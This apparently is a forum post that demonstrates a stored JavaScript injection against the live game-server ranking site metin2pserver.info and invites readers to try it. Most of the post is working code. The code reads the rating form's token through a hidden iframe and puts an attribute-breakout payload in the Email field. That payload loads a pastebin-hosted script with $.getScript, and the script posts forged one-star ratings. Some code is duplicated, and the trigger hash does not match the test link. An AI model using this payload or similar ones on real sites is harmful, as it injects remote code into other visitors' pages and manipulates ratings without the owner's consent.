
security metin2pserver.info - Javascript code injection example


Hi,

Here is a small example of a code injection on the top list: metin2pserver.info.

 

If you want to test it yourself:

 

I hosted the following script here (https://pastebin.com/raw/28VjB803):

 

/**
 * Submits a rating to the site's rate.php endpoint.
 *
 * Loads rate.php for `serverId` in a hidden iframe, reads the value of the
 * form field named "s" from the iframe's document (presumably a per-form
 * anti-CSRF token — its exact meaning is not shown here), removes the
 * iframe, then POSTs the form fields together with that value. Reading
 * `iframe.contentDocument` only works when this code already runs on the
 * same origin as rate.php, i.e. inside the site's own page context.
 *
 * NOTE(review): the field values are URL-encoded for transport only; they
 * are never HTML-escaped here, so how the server encodes them on output is
 * the security-relevant part.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 * @returns {Promise<boolean>} true once the POST completed without a network
 *   error (the HTTP status is not inspected); false when no "s" value was
 *   found or fetch rejected. The promise never rejects.
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    // Hidden iframe: the form page is loaded only to read its "s" value.
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            // First element named "s"; undefined if the form has none.
            // contentDocument is null for a cross-origin frame, in which case
            // this line throws and the promise never settles.
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            // The iframe is no longer needed once the value has been read.
            root.removeChild(iframe);

            // Field names presumably mirror the rate.php form — not verified here.
            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            // Hand-rolled application/x-www-form-urlencoded body; keys and
            // values are URL-encoded only, with no HTML escaping.
            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    // Resolves true on any HTTP response, including error statuses.
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                // No "s" value found: nothing is submitted.
                resolve(false);
            }
        };

        // Attaching the iframe starts the load; onload was wired up above first.
        root.appendChild(iframe);
    });
}

// Trigger guard: the flow below runs only when the page URL carries this
// exact fragment; without it the script stays dormant on the page, which is
// worth knowing when looking for it in page sources.
if (location.hash === '#methowashere') {
    // Assumes a URL of the form .../server-<id>.html; exec() returns null
    // for anything else and the [1] access then throws.
    const serverId = /server-(.*?).html/.exec(location.href)[1];

    const name = prompt('Your name');
    const comment = prompt('Your comment');

    // Email left empty, rating fixed at 1; the returned promise is not awaited.
    rate(serverId, name, '', 1, comment);
}

To inject it, go to a server page (e.g. https://www.metin2pserver.info/server-mt2aom2.html).
 

Launch this script on the page:

 

/**
 * Submits a rating to the site's rate.php endpoint.
 *
 * Loads rate.php for `serverId` in a hidden iframe, reads the value of the
 * form field named "s" from the iframe's document (presumably a per-form
 * anti-CSRF token — its exact meaning is not shown here), removes the
 * iframe, then POSTs the form fields together with that value. Reading
 * `iframe.contentDocument` only works when this code already runs on the
 * same origin as rate.php, i.e. inside the site's own page context.
 *
 * NOTE(review): the field values are URL-encoded for transport only; they
 * are never HTML-escaped here, so how the server encodes them on output is
 * the security-relevant part.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 * @returns {Promise<boolean>} true once the POST completed without a network
 *   error (the HTTP status is not inspected); false when no "s" value was
 *   found or fetch rejected. The promise never rejects.
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    // Hidden iframe: the form page is loaded only to read its "s" value.
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            // First element named "s"; undefined if the form has none.
            // contentDocument is null for a cross-origin frame, in which case
            // this line throws and the promise never settles.
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            // The iframe is no longer needed once the value has been read.
            root.removeChild(iframe);

            // Field names presumably mirror the rate.php form — not verified here.
            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            // Hand-rolled application/x-www-form-urlencoded body; keys and
            // values are URL-encoded only, with no HTML escaping.
            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    // Resolves true on any HTTP response, including error statuses.
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                // No "s" value found: nothing is submitted.
                resolve(false);
            }
        };

        // Attaching the iframe starts the load; onload was wired up above first.
        root.appendChild(iframe);
    });
}

/**
 * Submits a rating whose Email field carries an HTML attribute-breakout
 * payload: a leading `"` to close the attribute the value is presumably
 * placed in, then a `style` attribute and an `onanimationstart` handler
 * that loads `script` through jQuery's `$.getScript`. It has an effect only
 * if the site renders the Email value into markup without HTML-encoding it
 * (which this post reports to be the case), if the page has jQuery loaded,
 * and if an animation named `fb_transform` exists in the site's CSS — none
 * of which is verified here.
 *
 * Defensive note: HTML-encoding every user-supplied field on output stops
 * the breakout at its root; a Content-Security-Policy that disallows inline
 * event handlers and restricts script-src would additionally block both the
 * handler and the remote script load.
 *
 * @param {string} script URL of the script the injected handler should load
 * @param {string} name   display name submitted with the rating
 * @returns {Promise<boolean>} the result of rate()
 */
function injectScript(script, name = 'Dummy') {
    // Assumes a URL of the form .../server-<id>.html; exec() returns null
    // for anything else and the [1] access then throws.
    const serverId = /server-(.*?).html/.exec(location.href)[1];
    const code = `$.getScript('${script}')`;
    const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;

    // Diagnostics only.
    console.log(`Server: ${serverId}`);
    console.log(`Name: ${name}`);
    console.log(`Script: ${script}`);
    console.log(`Injections: ${injection}`);

    // The payload travels in the Email field; the comment text is a placeholder.
    return rate(serverId, name, injection, 1, '[...]');
}

You can then inject it like this:

 

// Kicks off the submission with the hosted script URL; only rate()'s boolean is logged.
injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r));

You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere

 

Have fun 👺

Edited by metho
Incorrect link (see edit history)


There is no contact address through which the creator of the website could be informed about this; maybe he will see this post and fix it.
